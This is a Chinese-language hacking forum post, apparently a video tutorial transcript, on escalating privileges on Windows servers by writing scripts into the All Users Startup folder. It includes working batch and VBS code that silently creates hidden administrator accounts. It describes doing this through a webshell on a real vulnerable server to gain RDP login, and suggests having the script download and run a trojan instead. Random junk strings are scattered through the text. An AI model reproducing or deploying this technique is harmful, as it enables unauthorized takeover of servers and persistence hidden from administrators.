- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是
, j0 Y& O9 _& ^; {" O% I$ L2 Z启动 提权+ Z, K& q# w n% D& Z( \6 i
C:\Docume~1\All Users\「开始」菜单\程序\启动1 K+ k1 S! b8 o3 i; d u8 z' q! d
在这里必须有写入权限 否则此方法无效% I* i# [) P( V8 h I6 w
因为我是在网吧 这里显示不了路径 o5 S' S' f2 _9 W) d7 a
我去服务器上演示给大家看
G1 X* a- u, [. q6 O大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的
! v" k* v3 h3 d' A3 C- _. _文件 从而运行我们的文件
; F! i4 r# D9 E* M" b( X这里有两中方式 第一种是批处理2 L$ Y# {& o5 \3 P8 S+ \
我们来看下目前 我机器上的用户组) \$ w6 A _9 N- b2 v( V
目前我们没有521这个用户7 S1 D6 n3 q1 r( O- }
看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示& J+ T9 d. Y8 q$ U
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现
$ i, m9 @# r! p9 f$ R( l2 v( B% i下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的
* j4 m) } Q# G0 t+ P; t2 |大家看 已经成功加入了WMMY用户
- |+ M: |3 S2 a' z' j1 D网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了
- W) W+ [+ h8 Q5 g, I" p2 U8 Y当前终端服务端口: 33899 _( s2 q! j/ G9 L
系统自动登录功能未开启( \" r7 Q! s& d' I, W
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了/ z X% s5 Q5 P/ L% c- n
C:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
0 R$ [" q& m) _' z0 ]6 [' z2 w第一种隐蔽性太差 我们就用第二种吧
5 p5 V5 k6 r8 {已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去
8 b4 k) [7 w3 b* r5 C从而取得了3389的登陆权限
! a0 m+ `- J T5 N其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马- u: w# j! f' f, W' N
基本原理都差不多 我就不多介绍了: O# _& s1 Q8 M5 Q
教程结束```
: L5 [! f! H3 u@echo off
4 [8 s/ \( t) h& D2 wnet user 521 521 /add
) j7 s$ k R1 C, B9 I8 _) A6 lnet localgroup administrators 521 /add
' z0 B: I2 g8 c* f% m$ }. _6 g* `7 i: T4 c- ~8 m# |5 e
on Error Resume next7 E1 Z) u8 ~: A; I9 N
set wshshell=createobject("wscript.shell")2 o9 Y% c1 r4 L4 u) X( u. I/ w# p
a=wshshell.run("net user wmmy$ 1227 /add",0)
! _: V4 c6 S/ B% y. Ma=wshshell.run("net localgroup administrators wmmy$ /add",0)
0 g) G. G" {, X( R! _; C* o/ f
/ v1 A* }1 @/ `# Y t
# q8 t u; v2 V# k+ [点击下载
$ i5 s* h K! m\" y7 S |
-
2
评分人数
-
|